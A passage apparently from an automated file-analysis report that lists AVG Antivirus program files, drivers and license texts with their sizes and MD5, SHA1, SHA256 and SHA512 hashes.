                                                                                      d0ef0dbfe4fc627a6bd2489fe21a8d491cc965c0d26f16cbb5ad28ae851ac3847066fe1d65e979a9909ddde917679afd75ebfb9ee1f933279340b97830615350

                                                                                    • C:\Program Files\AVG\Antivirus\AvEmUpdate.exe

                                                                                      Filesize

                                                                                      5.0MB

                                                                                      MD5

                                                                                      003328c4a0b2c3fe0db2016aa806d90a

                                                                                      SHA1

                                                                                      9ddde2c708d277b89e4f37b41b4d4216d83d0b73

                                                                                      SHA256

                                                                                      db033dc56cee11f353c193b03d85a041cb71cf6951a17428ba497df443b186eb

                                                                                      SHA512

                                                                                      ac22f5de47494a3edbda5570a67fbc4bf70d85c37fd30fe3b7377b57502aff55266f9a8e8cf15ca251d00ae2e45dbebae992b2c2870e212bbabe48daf0463746

                                                                                    • C:\Program Files\AVG\Antivirus\AvLaunch.exe

                                                                                      Filesize

                                                                                      449KB

                                                                                      MD5

                                                                                      9aec76076bd002275b89249332e9ddbe

                                                                                      SHA1

                                                                                      c6ab73b7fb280f17993f8d99ce0e37cc9361514f

                                                                                      SHA256

                                                                                      1e71d70c568aac5943c4f63544724ad3e37d4fdfd0f4fa0a184fae0cd833009a

                                                                                      SHA512

                                                                                      862d1a63635620257968413305bca3be57acaf97c9bd42896427e2a205661583ad8c459c3f645c3a28d5c4a9039f70412d851d31e1a73fd35f2330219d40ce34

                                                                                    • C:\Program Files\AVG\Antivirus\BreachGuardSdk.dll

                                                                                      Filesize

                                                                                      2.0MB

                                                                                      MD5

                                                                                      29042e26983b64e3529a705de8b62a63

                                                                                      SHA1

                                                                                      e848eb98dee3d78e467fa686238db5797077f7d2

                                                                                      SHA256

                                                                                      1ea8efe87962a33ef85a60ae98da76aa19068d9b3b759bca2259cffc97efe59d

                                                                                      SHA512

                                                                                      9056198a888686f4b474c37fa1361c0d9953612b788eabf0f38165e8b023f3f3396f686163c42ca030b1f8e0fd535c4c9872075382e14b1835085a003547dcd1

                                                                                    • C:\Program Files\AVG\Antivirus\BrowserCleanup.ini

                                                                                      Filesize

                                                                                      42B

                                                                                      MD5

                                                                                      4957ed73d5e5e303e351c8f8b7b53e1c

                                                                                      SHA1

                                                                                      e61238f49e44237c56d4d5b41aeb150160880b74

                                                                                      SHA256

                                                                                      59727f7a256b7a70971f2e62b43b0a923937f85689fc3aa4ae50e4fbfbf83499

                                                                                      SHA512

                                                                                      db4854667285bb1cd8d07ab189607ec5bc489afb2d0a5b5a3388f91cefd012feca689787452901e0eb1de6e8792e69c0097c38b89bba0d977d0b29e5e5ef2feb

                                                                                    • C:\Program Files\AVG\Antivirus\CommChannel.dll

                                                                                      Filesize

                                                                                      1.5MB

                                                                                      MD5

                                                                                      4bb8829fb91aeaf4e2c1bbf0fdb1f3e5

                                                                                      SHA1

                                                                                      bab4edb0918549556c020e9ac212ba75589b2648

                                                                                      SHA256

                                                                                      382ba8244f92712b0641d1de5104e0305a620f20c9cde907cd3737364faa06a2

                                                                                      SHA512

                                                                                      de337ece82e5849a11ec7fa43228974643c7b67784a3e6a3b5f413a372858803bd3a363f335c8ec4d00ecbfb4bd981dda173eec1f4fed8e2125df432bd498399

                                                                                    • C:\Program Files\AVG\Antivirus\CommonRes.dll

                                                                                      Filesize

                                                                                      1.7MB

                                                                                      MD5

                                                                                      fc656c063ead5c9f490764508f5c3059

                                                                                      SHA1

                                                                                      67c24f25674d29f2f7d969458a6ec9c4154e1b5c

                                                                                      SHA256

                                                                                      ff5f832492c986b06fe7600f45928704b2442cb7f207c8b350a971be376e3346

                                                                                      SHA512

                                                                                      18c462fd1826da5f4aba7c18b57612c8d85643a28b5823b80022ecf08b7894f787c095ad57d3e4dc2351c32cc6a36a7d13c8e58c9e768bbf07080a5bb4945f00

                                                                                    • C:\Program Files\AVG\Antivirus\HTMLayout.dll

                                                                                      Filesize

                                                                                      4.0MB

                                                                                      MD5

                                                                                      3315d3db3365a69f40042c4268e941f5

                                                                                      SHA1

                                                                                      c0df5af5ebdebca34cefee188209fadaa93e6192

                                                                                      SHA256

                                                                                      0b7e30167e9471bf0358917b74b0dd3f88793183d5ed6c6f581124a8bacfaa50

                                                                                      SHA512

                                                                                      ffbf03f7350d1d2c4a09d1a90c4c5259d9bbd50463dcfb345ca7d98769fd481bbe2cf95563dce424fd8fd867f8d103bac3b004553932f178bd707f7a66debb2c

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgArDisk.sys

                                                                                      Filesize

                                                                                      20KB

                                                                                      MD5

                                                                                      e191291f7b8972316470d7e24a9aaab5

                                                                                      SHA1

                                                                                      2c8ea4b37d5a76a579a5b5324eed8bf2f9aff2ca

                                                                                      SHA256

                                                                                      5bb65316ffb94a7243e668d8f4a4798c09d1af31f5c3c52bce155184970393f2

                                                                                      SHA512

                                                                                      c5fdc1c2e459b8e3073a2936abc83632eaf876ed06fe4225e0a394e4526bc682cd15a2118d54fe7663699237f9efad4edbaf799f8af702a94907da0cab74a5ae

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgArPot.sys

                                                                                      Filesize

                                                                                      225KB

                                                                                      MD5

                                                                                      ab62d68c232f55045ae92b392be58bb1

                                                                                      SHA1

                                                                                      cd73da9599227fc99e3616312a83af6a854146f6

                                                                                      SHA256

                                                                                      b15f2638de37ab56f2dc4666e14ba9f66efd2711df334daf48069f2638d67dc2

                                                                                      SHA512

                                                                                      d1da189008888c7e34535d0723a07424064d2ce14c7a052ddc0b8895067de937d5f6ddd94bebb108beb6fdc0fb13ecf7cfaa75259ae6459f8a0cfce3f3e5fab6

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgBoot.exe

                                                                                      Filesize

                                                                                      307KB

                                                                                      MD5

                                                                                      f81987d4b788b50d1023687d2ea54825

                                                                                      SHA1

                                                                                      6bd7d8e555f6a9af108cc09ca0754089c0e51f95

                                                                                      SHA256

                                                                                      34500e4904ce50cad3538805ce58f491b69de11b9a4af6b0ba4c020add440270

                                                                                      SHA512

                                                                                      d588a985d2c66dac89af4be763abc12247399e4edeb3dc8609c90b061d402e0358cb9b186bd0ea90e03b68d910c6b9386e77edc2720d451886ebb04b4d3efa21

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgElam.sys

                                                                                      Filesize

                                                                                      27KB

                                                                                      MD5

                                                                                      4aeeb33bad81fced46fa7f90a17d60d3

                                                                                      SHA1

                                                                                      f3d6e8bbd96fb42f5c52b5ae4cebd933420102eb

                                                                                      SHA256

                                                                                      5cabd407ae502f3ea4bbec56460bdf6fcf5bf39284dbbc6d10db90665da4be62

                                                                                      SHA512

                                                                                      8dc259e22a3b14e8d6688c7b9a1113cfba8105ec7942518019a944a9ff1eb87c896ef149cc2f913429733654f6211bd6da944d3aba113cb513c0123f8848beb9

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgKbd.sys

                                                                                      Filesize

                                                                                      28KB

                                                                                      MD5

                                                                                      edd037e904cdf54ce09e9631ff147fdd

                                                                                      SHA1

                                                                                      02fc77f7711401c028820d427482283a3de22b20

                                                                                      SHA256

                                                                                      60cdae6e1b1f2cb7cacbd3618a48d7186bbeec9891b65cbce43be4280b5213ce

                                                                                      SHA512

                                                                                      86ba81cdfa45ae8b9b1eed81cf7fe055357a4b302f769c6280f12e6ba64da3bf8344f016f1e868f489d63db392f8b7c3b20a555c783dcb828d70f8b52890f457

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgMonFlt.sys

                                                                                      Filesize

                                                                                      262KB

                                                                                      MD5

                                                                                      083310d59f777755dc5439046552f1a5

                                                                                      SHA1

                                                                                      1d66c641653bb14275d29495173bfad2c52a8dbb

                                                                                      SHA256

                                                                                      ca08276698062e1398654b5f92c2443a9f3dc3588f60aa324ce51af410b87897

                                                                                      SHA512

                                                                                      c209767a179e6dca87c7ca837a634e4efbd846864f73c4d94cff180cf92e6ac0451ed1c33bd54917bb0cd27e7e3c8068af34389431cd9810c38dff3f2462946d

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgNetHub.sys

                                                                                      Filesize

                                                                                      536KB

                                                                                      MD5

                                                                                      2acd6fa999e77fe9aea56291e39ddb4b

                                                                                      SHA1

                                                                                      46ab62401f671b2aa6a9dfe6cc297725ca49d998

                                                                                      SHA256

                                                                                      413342b5a3ff91f80104dbf2024e5776986960dce52e93c57fa7df35557b6f4e

                                                                                      SHA512

                                                                                      5a96446ddf3858ee520ac0c1a172ed495647f07868f201af30fb3da41c1fb5e0e512353bec3f5c5efde50b82680d2d6e02f31e82024fb25c2e1422005072f06d

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgRdr2.sys

                                                                                      Filesize

                                                                                      91KB

                                                                                      MD5

                                                                                      f2e23a934f72b87e8d27d427bcc4cfe1

                                                                                      SHA1

                                                                                      e89e0a0ef5fe8e462cdd10109e438f61e1b198db

                                                                                      SHA256

                                                                                      ded97328c112f14470efe731c67cca09fa919b9385d027c3721b55f899eee3a8

                                                                                      SHA512

                                                                                      11448449f2969cac95f2ba2174d7b0d9d6dd41b4e3ca079005df68322ee8a336d7b0a912927af180b460477d4da5a1cba63d94aea4050c6fa723f19493f3415f

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgRvrt.sys

                                                                                      Filesize

                                                                                      67KB

                                                                                      MD5

                                                                                      7f3ee43b54d37613ccc45853e2f3eb5f

                                                                                      SHA1

                                                                                      00f31d346db1c01a5db610319c86f41076425dbf

                                                                                      SHA256

                                                                                      3fb204842fe88c30c04ee38f9baca19d0ec35e8e1ccb82e15462f990dc4951ce

                                                                                      SHA512

                                                                                      3e38840e9692282bf8e7ce56bdb5a419454576acd71d94fa849a8a10d0902b5f02c925cee074768bdf111c3c91fdd4f34435cea9872bbe28d068edb766ab3463

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgSP.sys

                                                                                      Filesize

                                                                                      679KB

                                                                                      MD5

                                                                                      dbeaccfbc149a6e2928a4d20837fc373

                                                                                      SHA1

                                                                                      2efdfc96375cb8e92bf5427dd5494c6639e1fd24

                                                                                      SHA256

                                                                                      4b5561cf9687704bf0d1dc48bc2d4eb06350566ec66906831a560d02427c8683

                                                                                      SHA512

                                                                                      828ec97ed4820f4ae2e65222b08497ed07ecf90ffa802adc2fff6fcec7d3bfc0e012c4d2cb2362cbd9981735af342f6f115c93332f3265b64cba0ad831141bee

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgSnx.sys

                                                                                      Filesize

                                                                                      914KB

                                                                                      MD5

                                                                                      2b86c5ddbf65905c6569f1508a9c40c1

                                                                                      SHA1

                                                                                      d1232fa2e3ae6ce5bed3a3ba19c347f1d3bc1d7c

                                                                                      SHA256

                                                                                      c5d808fe19e81a40ee4d80a623ac5333c036d47e0816eb319e6022e9aad509e9

                                                                                      SHA512

                                                                                      819af3f6cb1f837ea56f0333faad70afe5fe2606d333def8dedadea26e72038b34da8f0efb68095956b9198909d11683db109c6bc13fea309d559e72335b57f3

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgStm.sys

                                                                                      Filesize

                                                                                      197KB

                                                                                      MD5

                                                                                      a2c0380d658fd78e9f962664b781b635

                                                                                      SHA1

                                                                                      c5b27212694a0ad323022b3b2ff8e2fe6e620d45

                                                                                      SHA256

                                                                                      cc40c8a6df149cea58709506554587eb4c7cb21491e4e6a5d641773e8d3f98f5

                                                                                      SHA512

                                                                                      688fec9ea7a49134d01e0af74a547331342485f9d53fccd8a8d571686dfdf9afe88726f15515446cf82fd0fed4c5f5697377ae3302d79100693065202b6ad36c

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgVmm.sys

                                                                                      Filesize

                                                                                      299KB

                                                                                      MD5

                                                                                      b1b2ef05c95cb3905f42baee21a38055

                                                                                      SHA1

                                                                                      fbd4d98e237010a9d4a3ada00e76995194bbf44e

                                                                                      SHA256

                                                                                      c63383ad6a632b4376e952ccde2f94ea06be30c3f81978d81d44e8679807adbc

                                                                                      SHA512

                                                                                      8b41919209cf95e634126acbcbc2162fcd665ecaa13303d415a72618bff00f6120efbc1f34a0a6287e9876f867cb51bff19d7cecd269f104c111fde3dcd7abb7

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgbidsdriver.sys

                                                                                      Filesize

                                                                                      371KB

                                                                                      MD5

                                                                                      2dec9960003e978cb318be97ab618c63

                                                                                      SHA1

                                                                                      c4349969e816f075eb31ec0238208fe7782282b8

                                                                                      SHA256

                                                                                      738100bacb927eb3bd448d4be7a7693c2bb1810a98100ac30626bc569eb9e722

                                                                                      SHA512

                                                                                      bd710e9cd2efaa597884188366da76e419def53969c68f178af74462a049ca578b16e28df46e220dc1e1484ff6a306f80be1a5e018bf5738b233429517cdd9b2

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgbidsh.sys

                                                                                      Filesize

                                                                                      286KB

                                                                                      MD5

                                                                                      ae4dc8432489f29f4fd6d9cb2a73d1c3

                                                                                      SHA1

                                                                                      7d38d5bd11e732beb88a05b70083a72932113d07

                                                                                      SHA256

                                                                                      1f3c1e7f16bc6f49c110b8a343b270e600cab05ffc454acac8dd1768a44c40ac

                                                                                      SHA512

                                                                                      5ba4b10f41a3c968190f247677479fe78bcf5dc3d160d714cb2d3c77388b698ee358ad330f6cebc3100a64de62ddf8ff99989b0b61b52cdded0c965064b10f03

                                                                                    • C:\Program Files\AVG\Antivirus\Inf\x64\avgbuniv.sys

                                                                                      Filesize

                                                                                      82KB

                                                                                      MD5

                                                                                      e487d98b0ab4e8d92e4c0e0474196e78

                                                                                      SHA1

                                                                                      2a06e20fd93b1e998ff1397ad3867a61c3612ee5

                                                                                      SHA256

                                                                                      faac1f98e6bf6e2025e2b237d51da4f91f169ec8e46e134a19aeede585f848ff

                                                                                      SHA512

                                                                                      d9f2a553a21de4543b8f29b5ca6d652c4d3b76881c58536f80a0203c5566fe376be19805e95433d58e72e82fb1e527ce206aaa0a3f5004d55a5fe1dc13bd5073

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\Boost.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      b51058fead1aa71840b79527f5bffd3d

                                                                                      SHA1

                                                                                      bc3c4d41d4cc7753bea8e7a77fdb7cd384adbb59

                                                                                      SHA256

                                                                                      beb8e42e9d6b4284e03304d05a81a0755200a965fc8d0a5e0aea1e84cf805d6e

                                                                                      SHA512

                                                                                      f1a8d21ccbb6436d289ecfae65b9019278e40552a2383aaf6c1dfed98affe6e7bbf364d67597a131642b62446a0c40495e66a7efca7e6dff72727c6fd3776407

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\Crypto++.txt

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      15f12037d9859d059c3a557798163450

                                                                                      SHA1

                                                                                      b3609a3d6832159913cc9b8fb128df1383087b24

                                                                                      SHA256

                                                                                      e668af8c73a38a66a1e8951d14ec24e7582fee5254dd6c3dae488a416d105d5f

                                                                                      SHA512

                                                                                      a976ecbe99ab8f29c8290f26df5906326e820eb3f212928cd2b74783716bb6b7b6e75104140b2816408af15a1db30f4f5ab05133baa2c2d3a6e48c6d915fa915

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\Detours.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      c26b34f5996c7ed7f7bce6aaf6c8a98b

                                                                                      SHA1

                                                                                      553e3a3efec9a07d9b08fcaadbcd88f2099aada8

                                                                                      SHA256

                                                                                      f854ae8aabc0404652b48a2b3bf7f21ec174c69d73f5596934c20884eb0639ef

                                                                                      SHA512

                                                                                      e3c82bfe3bacb07e3a8327a01b2c9772e44bfa1a8012c0f0b363d6e3b2ee2371bc66f9c207611cd6f73d6f1ff1ceb9b2bf2c7d0864ade256d41d533b598a804f

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\GSL.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      598fd6266b820d382b6f1134f56351f2

                                                                                      SHA1

                                                                                      91d5e0457d0b8a0b9c0a2f557e0e2dc4d7f3805f

                                                                                      SHA256

                                                                                      656e11ea18f7fb862f6625469b822583f3c08e986b3a24962d74737ebf6927e6

                                                                                      SHA512

                                                                                      a1de7199ffc3adf0a4679b47ce77ccdd6ebe7ece123d286c58236a08b64c13c707e590fb5a12ad0a72e6a5907356f4d5754151eb7fb45a99d71caa50912c16e5

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\ICU.txt

                                                                                      Filesize

                                                                                      20KB

                                                                                      MD5

                                                                                      a2a0baea9713f129f7d433dcfc635167

                                                                                      SHA1

                                                                                      349e31d4f425c71d5c63e2dcf4a19f5e0edcb57b

                                                                                      SHA256

                                                                                      f155f8f66833bdc8e0479656256bfac1d66a9ec9df4aa56292308f522b4e3fa7

                                                                                      SHA512

                                                                                      87dd90b17aed6c5aaca53baaa3d149c07028f730ca34681842aa9c855817413345af27a0bd27dfc64677ed6d9b2e9013b585bda06130315cbdccf0a27103a809

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\JsonCpp.txt

                                                                                      Filesize

                                                                                      2KB

                                                                                      MD5

                                                                                      51d2728ac2976fdf6eeb3a02cd58982e

                                                                                      SHA1

                                                                                      3d4af58a6b52ee70064abf68a2412aac2cddd42e

                                                                                      SHA256

                                                                                      c3aed6a54154090685df3bbcd72e7a84943a4f3d5e5491bc6446a0b2d538c493

                                                                                      SHA512

                                                                                      734dae65afc8b551ecbf6665dd0a48de8eff2cb815a079a2bd7e37e19388253e39441a779403cb553d091449ae1eb858ba560726b86b2486220bc694f85cb6b3

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\LZMA.txt

                                                                                      Filesize

                                                                                      600B

                                                                                      MD5

                                                                                      d774c7a88d7b41d7c73490067b54e3a4

                                                                                      SHA1

                                                                                      661206b3d45d9f6836915cb266f8536ef8ed39d9

                                                                                      SHA256

                                                                                      6182268f7c8c37fef81e83f722d1ac9bd1ea4307f16005a6900bc1aa473828e0

                                                                                      SHA512

                                                                                      7f9bc6a96e2cd7a1b8522edbcb72be141a5136dda654e0e8ab5ccf39a216b23478c64bb4fc68a71ee303237e6e9e063adb84873bb786e235e9a039d914e7b762

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\OpenSSL.txt

                                                                                      Filesize

                                                                                      10KB

                                                                                      MD5

                                                                                      97aa3aafa51953d4ad591398b916595e

                                                                                      SHA1

                                                                                      a849084b5239438f44c43b52576171f660576e2f

                                                                                      SHA256

                                                                                      ed72ce2b51ee58f117e5a021e2e04af158857f40269fbc03491f0b2a99dbcc96

                                                                                      SHA512

                                                                                      0b54f6b692ee9c92e0a867361b1601459cf6bcbd653b902e1dafacf3ec445af11023e8a5f7485e4513d351ec662ba39dfd52a9e84858128e512e68ace970c18b

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\PCRE.txt

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      347dfef587108750fa72297199fcc986

                                                                                      SHA1

                                                                                      0e34d7cd8afeb7e3a17bb25f371262a1ddc564df

                                                                                      SHA256

                                                                                      08bebda80b178f4b558faed4e52930f66e855614e4dfae15a436733b4712e041

                                                                                      SHA512

                                                                                      defa096320296c640a94a6abead06698a7682bf522dc1f216bd6a3fb70519d789b83ac061a518672987f6cf2d5fe5f7e60d1f9dccfec5b74c9b387ed591339ea

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\Xerces.txt

                                                                                      Filesize

                                                                                      2KB

                                                                                      MD5

                                                                                      b2feaa6a26c0149af9c4fbe2d6b692b1

                                                                                      SHA1

                                                                                      23df548394b0b16e6d5c733b427307288e1b359b

                                                                                      SHA256

                                                                                      d7e3eaf9a5ec61dd5f4065d252a2b0130c0e300ac3ac9cb307469e2a86ebbca7

                                                                                      SHA512

                                                                                      156e4cb2a1ae146cee9cd25258b299fdfab716866eabbab3e01f23a0e063e4469537c0a1e497d36f829e710211fca7db58608ae6bce87cacb75c66c8a57483b3

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\brotli.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      7df5cd81700618ef9926feb32290d2af

                                                                                      SHA1

                                                                                      4763ba7dfa7730d98b190dd8a4a2c6818d301fcb

                                                                                      SHA256

                                                                                      60ae0f13e76cc2eaaa108677eefa4ce16b647f6bbe8cf0a1ac9429d82eca7248

                                                                                      SHA512

                                                                                      92c0bbdc5155d6e218682840dde38697327973b8f45e0c6d100705601449a6f1f8eba74cef8bcadf09ea945602b378bc64e81885f40965fa038d7974a71e5641

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\bsdiff.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      a5f132cdee178b77dcac80346cc12b62

                                                                                      SHA1

                                                                                      d44350c4d2332a9a30f154f896e88a3e89016825

                                                                                      SHA256

                                                                                      331b34c5d939627eb370fe4250beaec0d0fb5edbf687b0c3631930385026cf7c

                                                                                      SHA512

                                                                                      d3e45ff903524667e40fd06870c957eff349e44eef22a2d9e9e01db9ff806dcfb3082ad5bf974b864944a6c4b2d7d9910d67e440a5bdb50be23600115537588f

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\bzip2.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      9087d9182e280d5a124e844fcf52af82

                                                                                      SHA1

                                                                                      058d1d953744a7ace99b86c97238a3083dde120b

                                                                                      SHA256

                                                                                      5eca2c8028dee3a4728012bc60a763f69205325d0eb75b344cb7e10a788faa96

                                                                                      SHA512

                                                                                      18758d28733aa9db4257db7a18176a8459265021f6cc60e48ee6bbca422411d798bc597a683afefce0045c2b025e65577f6ed085fa8c9acb10b3e23464da6dfb

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\c-ares.txt

                                                                                      Filesize

                                                                                      673B

                                                                                      MD5

                                                                                      128b02ba4177d31ef91600882bb0baba

                                                                                      SHA1

                                                                                      6b98f098fa3f1cab58b9610b0af9c9545d5010e2

                                                                                      SHA256

                                                                                      b87ac954a37f855f6f7199a3154e2e84623558df980e8afccb94c5c93bd4cba3

                                                                                      SHA512

                                                                                      77b2fb5862bd1d999cd9549319ffe492ed20aa63659003bfb48c2426242984f97b6666ba9afbb0cb7d71a46f4f5f7e883e31c248f9b9eec339e3d4d7ffa66a0c

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\cURL.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      8915cda79ecb12328ccb33113dc85ecc

                                                                                      SHA1

                                                                                      127e0111a102fb3f6af9ad82d0620f4c4ac2c164

                                                                                      SHA256

                                                                                      7c3794f6aa18b133dc86045d00f3d5894682084692a959ce521982eed4554f37

                                                                                      SHA512

                                                                                      30acf8eb04e4063478c8ce0879c838dd9f9083efb6e239393f4727cea279a171ac4c597f3f1bf855210eed3091acfb50d9d31851cf6a147774f3bf246d6f4d59

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\cef.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      4434d135a9d9631e1741ce7254375a0f

                                                                                      SHA1

                                                                                      e2d2dd3fa7a0f0f7814118af8c03094fc325d333

                                                                                      SHA256

                                                                                      2e69c36a7eaa4fa153426eab635c607ea0356cbc7a68a70f42a49e8ab8eb8106

                                                                                      SHA512

                                                                                      9c59379e08895138e88b588f0ee3c4ab0938e8fd6906ab041484c6ed90da38c7ef9df7843002abe5249b359dac56c9c064f9119e58eeb1fd34bb2b7a35194450

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\dnscrypt-proxy.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      7eee1933e27bfd222f8ecd48d463c30b

                                                                                      SHA1

                                                                                      506dd04ac3db8729abffd4132294d017b8b1fba6

                                                                                      SHA256

                                                                                      e9bfbf4cd2bb60ea2982dc50dee92466a81a42de9b40e65c4ee17298646c7bce

                                                                                      SHA512

                                                                                      279d059dfa2c81c371000b865fe49389fa911bebf4c4f7e83379598e3e109852b14a185f1bd970dc94ad53a804d7554a4547dbe7bd7902781daa8da1898f7885

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\intel_asm.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      4cddb654fe704264c203b4d9c7c832c0

                                                                                      SHA1

                                                                                      9d236e8f305b4bc8c486de24549a706a3957c210

                                                                                      SHA256

                                                                                      634788199f33637e3cc36c61e5272f72ccbdab87be0c07eaaaf487c5f4f1ce82

                                                                                      SHA512

                                                                                      1933696744c8a95bc6c82ef0d19e99f1d4291f6e0aaf8570e45bd74065ec076ea9b3e4b030ebc8df52903f4f98aef6a9727d3370834efb9187e4ce24ab9a0180

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\jansson.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      928ffcbe179ca1faa2d4a2747ccab1b7

                                                                                      SHA1

                                                                                      0978fa6a4bb455f6237eca37956d179b7512fc1f

                                                                                      SHA256

                                                                                      c8d3b9240b998223daf58ea16bf2856caa5cdbcb75e93d4fd20c548033d885e2

                                                                                      SHA512

                                                                                      627af0d12924e508694e977823fd6d705700eec590e9edd432605078b007143cee5c70391143ae259cff9287db89fc3e613198c4c586236d71e2de70cbc6d0cc

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\lexbor.txt.ipending.33edda96

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      513ea4bce55c427e58b1b6d40d087d24

                                                                                      SHA1

                                                                                      d2f6cc5490d34da9fd15e6edee4995d6eeb42892

                                                                                      SHA256

                                                                                      7732fa42ebc8652ee3300a086a068f6aa5008cfa0d14948b144e4b06c82efda7

                                                                                      SHA512

                                                                                      0c9f8d90f4ca229b5f175384d0cf348cdb8bccc062ba5b2f97d5aba0b9d823b0ebc2a0634041ec70e62715250a238b41b0c31ccd76ac24b8e864508d93251931

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\libPNG.txt

                                                                                      Filesize

                                                                                      5KB

                                                                                      MD5

                                                                                      9c08c5872a3314661e37289d53a846e4

                                                                                      SHA1

                                                                                      ddad81444c937f22e749ab9518058682953b1cdb

                                                                                      SHA256

                                                                                      0ad3bfee8be10e5519949e7af492e36bc349376b75fbeb412229a5967e3e9434

                                                                                      SHA512

                                                                                      dda85f29349e7222a6487f91e42e798c6d93a091fb01ed08d7caff5b906a2732788fea763d3e8fd10084361af8531ba2059e2410e845390c937aff659cd0fa36

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\libevent.txt

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      d6913685a013829414179d17903310af

                                                                                      SHA1

                                                                                      d665df4878ae79173751d5a8a4346c1e2567f232

                                                                                      SHA256

                                                                                      8dd48e57572d33854a835ba6bb045d9a01321bae43377934fc08ce642992206b

                                                                                      SHA512

                                                                                      228fa37c918f781f3151b7cebfaa2575c70e515193adcae66a25c5de0035199ba935e677c1df1b2acf6951b43ad4e253a5277ccd72aff9bc60cf6f1bbf444eaa

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\libsodium.txt

                                                                                      Filesize

                                                                                      841B

                                                                                      MD5

                                                                                      dcd04d4748467021571f4a01f797ddae

                                                                                      SHA1

                                                                                      c59d498fa113b09406389f8828dde6407f5a651d

                                                                                      SHA256

                                                                                      7b8c5dbc64e5ce65c94d31b5690a0e30ff83222bbbbb859df2a56b9dfef14326

                                                                                      SHA512

                                                                                      7ae6a19fdda606f467c15e97ba08620838961bf64d9c5b6843cd877a23f0697bde8874842b12e3c317e18b4f8609531bb05414d5ed4ec68337ce8e1c73aae64e

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\lzfse.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      fe680362852389fe7a16c47aae27bc92

                                                                                      SHA1

                                                                                      377ea1b96cabe859af78bb561ca4171544ab0152

                                                                                      SHA256

                                                                                      e89251cdaaf385d93f74b819412217e47a7a06cd65115a1f87eedda0dffb2947

                                                                                      SHA512

                                                                                      8bb0e1ae7fc66e12581b43c0823e82011ec88d714eb244a840a46272d9c04163893217b6ae6c42d07ef72c88ea154950282ef09f0aef2dd44a3e42de709135ef

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\mbedTLS.txt

                                                                                      Filesize

                                                                                      11KB

                                                                                      MD5

                                                                                      d229da563da18fe5d58cd95a6467d584

                                                                                      SHA1

                                                                                      b314c7ebb7d599944981908b7f3ed33a30e78f3a

                                                                                      SHA256

                                                                                      1eb85fc97224598dad1852b5d6483bbcf0aa8608790dcc657a5a2a761ae9c8c6

                                                                                      SHA512

                                                                                      e2f81cb44129e1bc58941e7b3db1ffba40357889bace4fd65fd254d0be1bb757625bdf36bf46d555eb3ca4b130dcd1c05225caec28d8472dccf52a63dbd6e185

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\mhook.txt

                                                                                      Filesize

                                                                                      11KB

                                                                                      MD5

                                                                                      d273d63619c9aeaf15cdaf76422c4f87

                                                                                      SHA1

                                                                                      47b573e3824cd5e02a1a3ae99e2735b49e0256e4

                                                                                      SHA256

                                                                                      3ddf9be5c28fe27dad143a5dc76eea25222ad1dd68934a047064e56ed2fa40c5

                                                                                      SHA512

                                                                                      4cc5a12bfe984c0a50bf7943e2d70a948d520ef423677c77629707aace3a95aa378d205de929105d644680679e70ef2449479b360ad44896b75bafed66613272

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\nanopb.txt

                                                                                      Filesize

                                                                                      918B

                                                                                      MD5

                                                                                      c58efea00b9a80527a4eb1edf3b48d42

                                                                                      SHA1

